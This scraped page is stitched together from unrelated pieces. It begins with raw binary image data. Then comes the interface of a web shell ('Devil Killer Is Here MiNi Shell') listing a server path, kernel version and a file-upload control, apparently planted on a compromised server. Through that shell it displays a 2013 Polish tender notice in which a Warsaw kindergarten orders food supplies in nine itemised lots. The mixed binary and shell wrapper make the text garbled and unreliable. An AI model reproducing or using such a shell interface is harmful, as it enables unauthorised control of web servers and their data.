JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131120/473478-N-2013.html

<p class="kh_header"><b>Warszawa: : DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM NA 9 PAKIETÓW</b><br>
<b>Numer ogłoszenia: 473478 - 2013; data zamieszczenia: 20.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 24 , ul. Drewniana 10/16, 00-345 Warszawa, woj. mazowieckie, tel. 22 826 42 63, faks 22 826 42 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p24.przedszkola.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> : DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM NA 9 PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> : DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM NA 9 PAKIETÓW.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.80.00.00-6, 15.50.00.00-3, 03.22.00.00-9, 15.81.00.00-9, 15.89.60.00-5, 15.20.00.00-0, 03.14.50.00-3, 41.11.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz.U. z 2013 r. poz.907 z późn. zm.)Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz.U. z 2013 r. poz.907 z późn. zm.)Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz.U. z 2013 r. poz.907 z późn. zm.)Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu wymagań zawartych w art. 22 ust.1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz.U. z 2013 r. poz.907 z późn. zm.)Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p24.przedszkola.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZEDSZKOLE NR 24 00-345 WARSZAWA, UL. DREWNIANA 10/16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2013 godzina 10:00, miejsce: PRZEDSZKOLE NR 24 00-345 WARSZAWA, UL. DREWNIANA 10/16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO I WYROBY CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka długa, typu wrocławska, świeża - 250 g	
szt.	
      875,

Chałka tradycyjna, świeża - 310 g	
szt.	
     300,

Chleb biały, pszenny, świeży - 570  g	
szt.	
     900,
Chleb razowy wieloziarnisty, świeży - 500 g	
szt.	
      700,

Kajzerki świeże - 50g	
szt.	
      600,

Drożdżówki - różne smaki	
szt.	
    300,

Bułki grahamki  świeże  - 350g.	
szt.	
       880,
Bułeczki ciemne z ziarnem 70 g	szt.	1000,
Chleb  razowy  słonecznikowy - krótki termin przydatności	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MLEKO I JEGO PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko pasteryzowane, homogenizowane o zawartości tłuszczu 2%,  pakowane w folię o pojemności 1l	
litr	  
    4000,
Mleko w kartonie 1 l UHT o zawartości tłuszczu 2%	litr	      400,

Masło świeże w kostkach , zawartość tłuszczu min 73%, opak. 200g.	
szt.	
880,

Masło roślinne pakowane w kubeczki plastikowe o poj. 250 g - zawartość tłuszczu 80%	
szt.	
375,
Śmietana o zawartości tłuszczu 12% opak. Plastikowe o poj. 400 ml		600,

Serek twarogowy typu Almette, śmietankowy , opak. 150g.	
szt.	
60,
Serek twarogowy typu Almette, ziołowy , opak. 150g	szt.	60,

Ser topiony śmietankowy w bloczkach  -100g	
szt	
60,

Ser żółty gouda tłusty, pakowany w bloczkach do 1500 g	
kg	
75,
Jogurt  naturalny  pakowany w kubeczki plastikowe o poj. -  150g.	szt	    3500,
Ser twarogowy półtłusty - krajanka  klasa  I , pakowany  w  opakowania  papierowe 
	kg	350..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO I WĘDLINY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z piersi indyka bez skóry, elementy świeże	
kg	
               50
Udziec z indyka z kością, bez skóry elementy świeże	
kg	
             60

Filet z kurczaka bez skóry, elementy świeże	
kg	
              60

Kurczaki tuszki surowe, świeże	
kg	
             16

Pałeczki z kurczaka, surowe, elementy świeże	
kg	
           110

Schab wieprzowy środkowy ,bez kości, surowy, elementy świeże	
kg	
            100

Wieprzowina łopatka, surowa, bez kości, elementy świeże 	
Kg	
          100

Wieprzowina  szynka surowa, bez kości, elementy świeże	
Kg	
            40

Łopatka cielęca, bez kości, elementy świeże	
kg	
           50

Udziec wołowy bez kości, elementy świeże	
kg	
           50
Pręga wołowa surowa, bez kości, elementy świeże	
kg	
          20
Polędwica wieprzowa surowa, elementy świeże	kg	          30

Kiełbasa sucha, typu krakowska
Kg	
           15

Kiełbasa  typu podwawelska
Kg	
            18

Parówki typu  Berlinki - produkt wędzony parzony, odtłuszczony 70% mięsa	
Kg	
           40

Polędwica z indyka  miodowa - wędlina	
Kg	
           35
Szynka wieprzowa  bez tłuszczu  gotowana	
Kg	
           50

Polędwica  wieprzowa typu sopocka	
Kg	
         38
Kiełbasa szynkowa  wieprzowa	
Kg	
         12



Pierś z indyka wędzona nie mielona typu wędlina
	
Kg.	
         5

Szynka drobiowa - wędlina	kg	
              35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ŚWIEŻE WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Botwina świeża w pęczkach	
pęczki	
15
Buraki  czerwone,  świeże, bez liści, nie nadmarznięte bez   śladów uszkodzeń mechanicznych i zepsucia	
kg	
130

Cebula świeża bez szczypiorku, krucha nie nadmarznięta	
kg	
100

Dynia świeża, dojrzała, bez uszkodzeń i oznak zepsucia	
kg	
18

Fasolka szparagowa  świeża, bez uszkodzeń	
kg	
32

Kalafior świeży, bez uszkodzeń, jędrny duży	
szt.	
100
Kapusta głowiasta, biała, świeża nie nadmarznięta, bez uszkodzeń 	
kg	
180

Kapusta kiszona - wiaderko 3 kg	
kg	
100

Kapusta pekińska, nie nadmarznięta, bez uszkodzeń	
kg	
110

Kapusta włoska, nie nadmarznięta, bez uszkodzeń	
kg	
50
Kapusta czerwona, głowiasta, nie nadmarznięta bez śladów uszkodzeń	
kg	
50

Koper świeży, czysty w pęczkach	
pęczki	
250
Kalarepa  czysta, świeża  bez  uszkodzeń nie nadmarznięta	kg	10
Marchew bez naci, świeża, sucha, nie nadmarznięta, bez śladów uszkodzeń	
kg	
1000

Natka pietruszki, czysta, świeża w pęczkach	
szt.	
320

Ogórki  świeże, czyste bez uszkodzeń	
kg	
170

Ogórki kwaszone, jędrne w  wiaderku - 3 kg	
kg	
150

Ogórki małosolne, pakowane w wiaderko - 3 kg	
kg	
8

Papryka czerwona słodka świeża, zdrowa bez uszkodzeń	
kg	
75

Pieczarki czyste, świeże, bez uszkodzeń	
kg	
30

Pietruszka korzeniowa, świeża bez uszkodzeń	
kg	
280

Pomidory świeże, zdrowe bez uszkodzeń - produkt polski	
Kg	
370

Pory czyste, świeże	
kg	
150

Rzodkiewka czysta bez uszkodzeń, pakowana w pęczki	
pęczki	
340
Rzodkiew  biała  czysta bez  uszkodzeń	
kg	
20

Sałata zielona, czysta, zdrowa     	       	
szt.	
438
Sałata lodowa, czysta, zdrowa bez uszkodzeń	
szt	
60

Seler korzeniowy, świeży bez uszkodzeń	
         kg	
220

Szczypiorek drobny, czysty, pakowany w pęczki	
pęczki	
180
Ziemniaki nie  zzieleniałe , czyste, suche nie zmarznięte nie kiełkujące, bez uszkodzeń	
kg	
3000
Czosnek	szt.	20

Gruszki świeże, słodkie, dojrzałe bez uszkodzeń	
kg	
120
                                                                                                       Jabłka kruche, słodkie nie nadmarznięte bez  śladów  uszkodzeń	
kg	
1500

Brzoskwinie krajowe	
kg	
50

Morele  krajowe	
kg	
30
                                                                                               Truskawki świeże, czyste, suche, pakowane w łubianki po 2kg
	
kg	
60

Śliwki świeże, słodkie	
kg	
140

Arbuzy świeże - dojrzały, bez uszkodzeń	
kg	
40

Banany- średnio dojrzale, nie nadmarznięte bez uszkodzeń mechanicznych
	
kg	
600
Cytryny świeże, dojrzale bez oznak zepsucia, bez uszkodzeń mechanicznych	
kg	
30
Cukinia - świeża nie  nadmarznięta, bez śladów uszkodzeń mechanicznych i zepsucia	
kg	
30
Grejpfruty -  świeżenie nadmarznięte, bez śladów uszkodzeń mechanicznych i zepsucia	
kg	
50
Mandarynki - bez pestek, słodkie nie nadmarznięte bez uszkodzeń mechanicznych	
kg	
200
Pomarańcze - świeże, słodkie nie nadmarznięte, bez śladów uszkodzeń mechanicznych i zepsucia	
Kg	
30
Winogrona zielone, świeże, bez pestek, słodkie, nie zepsute  bez śladów uszkodzeń mechanicznych	
kg	
50
Melony dojrzale, nie nadmarznięte , bez śladów uszkodzeń mechanicznych	
kg	
30
Nektarynki dojrzale, nie nadmarznięte, bez śladów uszkodzeń mechanicznych	
Kg	
20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RÓŻNE ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas plastry w syropie puszka 565g	
szt.	
19

Brzoskwinie połówki w puszce  820 g	
szt.	
19

Bułka tarta - 400 g	
szt.	
250

Biszkopty delikatne, długie, bez nadzienia pakowane w folię 150 g	
szt.	
38
                                                                                                   Biszkopty okrągłe, bez nadzienia - 150 g	
szt.	
80

Cynamon  mielony pakowany w torebki  30g	
szt.	
13

Chrzan  tarty w słoikach bez konserwantów  260 g	
szt.	
8

Ciastka  owsiane - pakowane w opakowania 250 g.	
szt.	
60

Cukier biały, sypki, pakowany w torby a 1000g	
szt.	
400

Cukier puder a 500 g 	
szt.	
25

Cukier waniliowy a 32 g.	
szt.	
240

Drożdże a 100 g	
szt.	
40

Dżem owocowy  niskosłodzony z   zawartością owocu 45 g w 100g wyrobu gotowego słoik ok. 280g	
szt.	
100


Galaretka - bez sztucznych barwników i konserwantów ok.75 g	
szt.	
60

Groszek konserwowy - puszka ok. 400 g - produkt polski	
szt.	
20

Groch nasiona suche bez zanieczyszczeń
	
kg	
25

Herbata owocowa - ekspresowa (różne smaki) , pakowana  w kartony po 20 szt. - 80 g	
szt.	

250
Herbata zielona pakowana w opakowania po 20 szt.	szt.	
80


Kasza jaglana pakowana w torby po  400 g.	
szt	
30

Kasza jęczmienna mazurska pakowana w torby - 900 g.	
kg	
70


Kakao naturalne  o obniżonej zawartości tłuszczu  - pudelka - 100g	
szt.	
100

Kasza gryczana  900 g	
kg	
50

Kasza manna  400 g	
kg	
32

Kawa zbożowa  pakowana  w opakowania po  20 szt.	
szt.	
40

Kawa  Inka  pakowana w opakowania  po  150 g.	
szt	
30

Koncentrat pomidorowy 30% - w słoikach  - 190g.	
szt.	
180

Kukurydza konserwowa - puszki - 425g.	
szt.	
20

Liście laurowe  - suszone, torebki - 20g.	
szt.	
12

Majeranek 14 g	
szt.	
20

Majonez jogurtowy  w słoiku - 200g 	
szt.	
20

Marmolada wieloowocowa - pakowana w opakowania plastikowe  po  500g.	
szt.	
10

Makaron świderki- 4 jajeczny - 500g (bez sztucznych barwników)	
kg	
        200

Makaron krajanka 4 jajeczny - 400g.- (bez sztucznych barwników)	
kg	
        50

Makaron  nitki - 4 jajeczny - 250 g (bez sztucznych barwników)	
kg	
          32

Makaron  muszelki - 4 jajeczny - 500g (bez sztucznych barwników)	
kg	
          50


Makaron  pełnoziarnisty -świderki pakowany w opak.  400 g 
(bez sztucznych barwników)	
szt.	
        25

Mąka pszenna 1000g	
kg	
375

Mąka ziemniaczana -500g.	
kg	
50

Mięta ekspresowa, pakowana po 20 saszetek - 40 g	
szt.	
70

Rumianek  ekspresowy pakowany po  20 sztuk	
      szt.	
30

Miód pszczeli naturalny wielokwiatowy  w słoiku 280 g	
szt.	
20

Musztarda  łagodna w słoiku -  200g.	
szt.	
8

Olej rzepakowy z pierwszego tłoczenia   - butelki o pojemności  1l.	
litr	
180
Oliwa z oliwek pierwszego  tłoczenia do sałatek - butelki o pojemności 
0,50 l.	Szt.	10

Pieprz prawdziwy, czarny, mielony - 20g.  	
szt.	
40

Fasola sucha - średnio-gruba  - 400g.-(bez zaniczszczeń	
szt.	
25

Płatki orkiszowe ekologiczne pakowane w torebki  400 g.	
szt	
40

Płatki owsiane a 400g	
szt.	
50
                                                                                                           Płatki ryżowe  - 400 g	
szt.	
90

Płatki jęczmienne  - 400 g 	
szt.	
65
  
Przyprawa do piernika pakowana w torby po 25 g.                                                                                                          	
szt.	
10


Torciki waflowe czekoladowe	
szt.	
150

Proszek do pieczenia  - 18 g.	
szt.	
90

Przyprawa - bazylia suszona  torebki - 10g	
szt.	
15

Przyprawa - tymianek suszony - torebki - 10 g.	
szt.	
15

Przyprawa - papryka słodka, mielona - 20 g	
szt.	
40

Przyprawa  - rozmaryn  suszony - torebki  20g.	
Szt.	
10

Przyprawa - Imbir mielony - pakowany w torebki 20g.	
szt	
5

Rodzynki suszone 200g	
szt.	
30

Ryż biały długoziarnisty, sypki, pakowany w torby I klasa  - 1000g	
kg	
90

Ryż  brązowy  naturalny pakowany w torby po 400 g.	
szt.	
80

Sok owocowy 100% , kartonik - 200 ml	
szt.	
300

Sól kamienna  - torby  - 1000g	
Kg	
90

Czosnek  mielony - przyprawa - 35 g. 	
szt.	
18

Szczaw konserwowy - słoik 270g	
szt.	
38
Wiórki kokosowe - torebki - 75 g	
szt.	
13

Zacierki - makaron - 4 jajeczny bez sztucznych barwników 
 - 250g	
szt.	
38

Ziele angielskie a 15g	
szt.	
8

Żurek typu śląski - bez konserwantów, butelki -480ml	
szt.	
90

Przyprawa - pieprz  ziołowy  20g.	szt.	18


Makaron Spaghetti  - 400g.	
szt.	
50
Króliki czekoladowe wielkanocne	
    szt.	
150
Mikołajki czekoladowe bożonarodzeniowe	szt.	150
		
Ziarno dyni suszone, torebki  100 g	szt.	60
Orzechy włoskie łuskane, torebki 100 g	szt.	60
Ziarno  słonecznika suszone  torebki 100 g	zt.	60
Orzechy laskowe torebki 100 g	szt.	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> JAJA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze, świeże, ściółkowe - waga 63-73g - badane pod względem jakości i przydatności do spożycia, pakowane - op. transportowe po 30 sztuk	
szt.	
    9000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet  z    dorsza  świeży bez skóry    - nie  mrożony  gatunek  I   	
kg	
    140

Filety z  Mintaja mrożone  bez  skóry -  mrożone pojedynczo  ,bez wody, bez  lodu  gat.  I   -  (nie głęboko mrożony)	
kg.	
      80

Paluszki rybne mrożone,  panierowane - mięso rybne nie mielone  gat.  I  	kg	      40
Makrela wędzona, pakowana pojedynczo  w folie, z terminem ważności- gatunek  I   	kg	       20
Łosoś  surowy bez skóry, bez ości - filety świeże nie mrożone  gat.   I	kg	      20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czarna porzeczka mrożona - op.  2,5 kg	
kg	
100

Truskawki mrożone - op.  2,5 kg	
kg	
         65

Wiśnie mrożone - op. 2,5 kg	
kg	
       140

Mieszanka wieloowocowa - owoce polskie - op. 450g.	
szt.	
        50

Fasolka szparagowa - op. 450 g.	
szt.	
90
Kalafior mrożony - op. 450 g	
szt.	
      110
Mieszanka wielowarzywna kalafior, brokuły, fasola, marchew
-op. 450 g	
szt.	
        75

Brokuły mrożone - op. 450 g.	
szt.	
        65

Włoszczyzna krojona  - op. 450g.	
szt.	
        60

Szpinak mrożony - op. 450g.	
szt.	
        32
